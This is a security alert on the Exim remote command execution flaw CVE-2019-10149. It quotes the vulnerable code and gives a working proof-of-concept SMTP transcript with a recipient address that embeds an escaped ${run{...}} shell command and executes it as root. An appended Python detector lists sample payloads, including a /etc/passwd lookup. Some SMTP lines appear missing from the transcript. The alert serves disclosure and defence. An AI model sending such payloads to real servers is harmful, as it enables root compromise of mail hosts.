ASA-2019-00320 – Exim: Remote command execution (RCE) via recipient address

Allele Security Alert



ASA-2019-00320, CVE-2019-10149


Remote command execution (RCE) via recipient address


The Exim Maintainers



Affected version(s)

Exim versions from 4.87 to 4.91

Fixed version(s)

Exim version 4.92

Proof of concept



A flaw was found in the way Exim validated recipient addresses. A remote attacker could use this flaw to execute arbitrary commands on the Exim server with the permissions of the user running the application.

Technical details

The vulnerable code is located in deliver_message():

#ifndef DISABLE_EVENT
  if (process_recipients != RECIP_ACCEPT)
    {
    uschar * save_local = deliver_localpart;
    const uschar * save_domain = deliver_domain;

    deliver_localpart = expand_string(
      string_sprintf("${local_part:%s}", new->address));
    deliver_domain = expand_string(
      string_sprintf("${domain:%s}", new->address));

    (void) event_raise(event_action,
      US"msg:fail:internal", new->message);

    deliver_localpart = save_local;
    deliver_domain = save_domain;
    }
#endif

Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory

john@debian:~$ nc 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost []
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31

250 OK id=1hTnYa-0000zp-8b
221 debian closing connection

john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)

In this example:

– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;

– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).
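The backslash escaping described above is what a reviewer of mail logs or of an inbound ACL would key on. The following is an added example, not part of this alert or of the Qualys advisory: it takes constructed sample recipient addresses, flags local parts that carry expansion syntax or backslash escapes, and shows what they decode to. The decoder is an assumption limited to the \xHH, \t, \n, \r and \\ forms; it is not Exim's own code.

```python
import re

# Constructed sample recipient addresses (not taken from any real log).
# The first is the escaped form shown in the PoC above; the others are
# benign, or suspicious for a different reason.
SAMPLE_RECIPIENTS = [
    r"${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost",
    "alice@localhost",
    "bob+tag@example.org",
    r"${lookup{x}lsearch{/etc/passwd}}@localhost",
]

# Escapes we undo; assumption: only the forms listed here are handled.
_ESC = re.compile(r"\\(x[0-9A-Fa-f]{2}|[tnr\\])")

def unescape(s):
    """Turn \\xHH, \\t, \\n, \\r and \\\\ back into the raw characters."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        return {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}[tok]
    return _ESC.sub(repl, s)

def split_address(addr):
    """Split on the last '@', so an '@' inside the local part is kept there."""
    local, _, domain = addr.rpartition("@")
    return local, domain

def classify(addr):
    """Return the reasons an address looks suspicious (empty list if benign)."""
    local, _domain = split_address(addr)
    reasons = []
    if "${" in local:
        reasons.append("expansion item in local part")
    if re.search(r"\\x[0-9A-Fa-f]{2}|\\[tnr]", local):
        reasons.append("backslash escapes in local part")
    # Check the decoded form: escapes hide characters a plain filter would catch.
    if re.search(r'[/|!%"\x00-\x1f]', unescape(local)):
        reasons.append("shell/path metacharacters after unescaping")
    return reasons

def scan(addresses):
    """Map each suspicious address to its reasons; benign ones are omitted."""
    return {a: r for a in addresses if (r := classify(a))}

if __name__ == "__main__":
    for addr, reasons in scan(SAMPLE_RECIPIENTS).items():
        print(addr, "->", "; ".join(reasons))
```

Note that a filter on raw characters such as "/" or "|" alone does not catch the escaped form; the decoded local part is what must be inspected.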


Qualys Research Labs


CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit

CVE-2019-10149 Exim 4.87 to 4.91

Fix CVE-2019-10149

Exim CVE-2019-10149, how to protect yourself

Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)



If there is any error in this alert, or you would like a comprehensive analysis, let us know.

Last modified: June 8, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.